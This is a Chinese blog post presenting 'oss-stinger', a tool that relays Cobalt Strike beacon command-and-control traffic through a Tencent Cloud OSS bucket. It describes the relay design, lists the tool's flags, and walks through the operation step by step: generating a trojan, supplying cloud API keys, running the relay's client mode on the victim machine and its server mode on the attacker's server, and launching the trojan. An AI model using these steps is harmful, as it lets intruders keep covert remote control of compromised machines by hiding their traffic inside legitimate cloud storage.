oss-stinger/腾讯云OSS上线工具

前言

项目地址:9bie/oss-stinger

前有云函数,域前置,辣么现在当然也要整个 oss 上线辣。然而实际整出来,优势也没想象中的辣么大,可能唯一优点就是部署方便?

原理很简单,直接就是一个 http 中继,本地起一个 http,然后把 cs 的上线地址设置为本地,然后另外一头,再服务器部署一个获取器,把 oss 上客户端发来的 http 请求下载回来,转发给 cs 服务器,然后拿到 cs 服务器的请求,再转发到 oss 上给客户端,然后客户端再转发给 cs bea­con,就完事了。

如何使用

.\oss-stinger.exe
  -address string
        监听地址或者目标地址,格式:127.0.0.1:8080
  -id string
        输入你的腾讯云SecretID
  -key string
        输入你的腾讯云SecretKey
  -mode string
        client/server 二选一
  -url string
        输入你腾讯云OSS桶的url地址

首先,现在 cs 生成一个 http 的 lis­ten,并把 host 都改成 127.0.0.1,然后生成木马

图片[1]-oss-stinger/腾讯云OSS上线工具-XSS博客

然后再把Host改会公网IP(这步很重要)

然后去腾讯云,申请一个 oss 桶。拿到 URL

图片[2]-oss-stinger/腾讯云OSS上线工具-XSS博客

然后再去 https://console.cloud.tencent.com/cam/capi 拿到SecretKey和SecretID。

然后就可以使用我们的工具了,先在客户机上起一个转发器,使用命令

?

1oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey

然后服务器运行

?

1oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey

然后在客户机双击你的木马,就能上线了

图片[3]-oss-stinger/腾讯云OSS上线工具-XSS博客
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容